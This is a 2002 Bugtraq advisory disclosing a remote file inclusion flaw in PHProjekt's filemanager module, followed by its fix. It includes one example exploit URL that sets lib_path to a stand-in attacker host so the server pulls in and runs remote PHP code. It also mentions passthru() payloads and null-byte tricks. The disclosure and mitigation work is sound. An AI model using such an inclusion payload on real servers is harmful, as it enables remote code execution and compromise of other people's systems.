[24662] in bugtraq
Command execution in phprojekt.
daemon@ATHENA.MIT.EDU (b0iler _)
Wed Mar 13 16:08:36 2002
From: "b0iler _" <b0iler@hotmail.com>
To: bugtraq@securityfocus.com
Date: Wed, 13 Mar 2002 08:54:39 -0700
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: <F54JSoFZ7Dz3QGZJ95X0001b51b@hotmail.com>
"PHProjekt is a modular application for the coordination of group activities
and to share informations and document via intranet and internet.
Components of PHProjekt: Group calendar, project management, time card
system, file management, contact manager, mail client and 9 other modules
...(feature list). PHProjekt is available for over 20 languages and 5
databases. of course - open source - PHProjekt is free software. Actual
version: 3.1a (02.02.2002)"
This script is a content management system for websites, much like slashcode
or phpnuke.
There problem is in the module filemanager, where you can directly access
the module and then define values which would have been defined with
the script's global configuration file had the module not be accessed
directly. The first line in filemanager/filemanager_forms.php is:
include_once("$lib_path/access_form.inc.php");
so an attacker could go to
http://site.com/filemanager/filemanager_forms.php?lib_path=http://attacker.com/nasty/scripts
and the script at http://hacker.com/nasty/scripts/access_form.inc.php would
get include()'d. I am sure you have seen the remotely included scripts with
the passthru() example many times.
If php is compiled with all_url_fopen off then an attacker would have a
harder time exploitting this. I can only see guessing the path to an
uploaded script as the only other way of exploiting this (if magic_quotes is
on - else null byte can do some damage). I believe it is secure since if
they upload a script with the name lib_path the path (ex.
/tmp/random/access_form.inc.php) will be stored in $lib_path. this would
make the include_once try to include
/tmp/random/access_form.inc.php/access_form.inc.php which would not work.
PHP will delete this /tmp/randomcharacters/access_form.php when it ends, so
it cannot be sent as lib_path once the error msg (if display_errors is on)
tells the attacker the path to the script. I heard concerns about this from
someone running php who wantted a secure install and configuration.
It would be best if all the modules included the global configuration file
as their first line and double check to make sure no variables are left to
other scripts passing them. Or some sort of modules.php script like phpnuke
has wouldn't be a bad idea ether and it locks security by making sure the
script isn't called directly.
The author took this advice and added this as the first line in the module:
if (!defined("lib_included")) { die("Please use index.php!"); }
Since I believe constants cannot be defined with GPC.
The author was contacted a few days ago and was very quick to respond. They
also took the security problem seriously, got out a patch asap, and notified
their mailing list. The author says the script will be in for a rewrite to
help improve overall security and structure. New version will be out
shortly.
_________________________________________________________________
MSN Photos is the easiest way to share and print your photos:
http://photos.msn.com/support/worldwide.aspx
